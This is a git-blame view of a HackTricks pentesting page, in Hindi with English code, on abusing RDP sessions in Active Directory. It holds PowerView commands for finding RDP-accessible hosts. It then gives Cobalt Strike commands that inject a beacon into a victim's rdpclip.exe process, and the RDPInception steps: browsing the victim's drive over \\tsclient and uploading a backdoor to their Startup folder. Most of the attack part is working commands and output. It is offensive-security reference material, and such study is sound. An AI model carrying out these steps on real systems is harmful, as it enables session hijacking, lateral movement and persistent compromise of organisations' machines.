hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

82 lines
6.3 KiB
Markdown
Raw Normal View History

2023-11-06 08:38:02 +00:00
# RDP सत्र दुरुपयोग
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
यदि **बाहरी समूह** को मौजूदा डोमेन में किसी भी **कंप्यूटर** का **RDP एक्सेस** होता है, तो **हमलावर** उस कंप्यूटर को **कंप्रोमाइज़ कर सकता है और उसका इंतजार कर सकता है**
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
एक बार जब उपयोगकर्ता RDP के माध्यम से पहुंच गया है, तो **हमलावर उस उपयोगकर्ता के सत्र में पिवट कर सकता है** और बाहरी डोमेन में उसकी अनुमतियों का दुरुपयोग कर सकता है।
2022-08-16 00:18:24 +00:00
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
2023-11-06 08:38:02 +00:00
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
2023-11-06 08:38:02 +00:00
अन्य उपकरणों के साथ सत्र चोरी करने के अन्य तरीकों की जांच करें [इस पृष्ठ में।](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
2022-08-16 00:18:24 +00:00
## RDPInception
2023-11-06 08:38:02 +00:00
यदि एक उपयोगकर्ता **RDP के माध्यम से एक मशीन में पहुंचता है** जहां एक **हमलावर** उसकी प्रतीक्षा कर रहा है, तो हमलावर को उपयोगकर्ता के RDP सत्र में एक बीकन संचित करने की क्षमता होगी और यदि **पीड़ित ने अपनी ड्राइव माउंट की है** जब RDP के माध्यम से पहुंचता है, तो हमलावर उसे पहुंच सकता है।
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
इस मामले में आप सिर्फ **पीड़ितों** के **मूल कंप्यूटर** को **भंग कर सकते** हैं, स्टार्टअप फ़ोल्डर में एक **बैकडोर** लिखकर।
2022-08-16 00:18:24 +00:00
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
2023-11-06 08:38:02 +00:00
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
2023-11-06 08:38:02 +00:00
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
[...]
2022-08-16 00:18:24 +00:00
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-08-16 00:18:24 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
2022-08-16 00:18:24 +00:00
</details>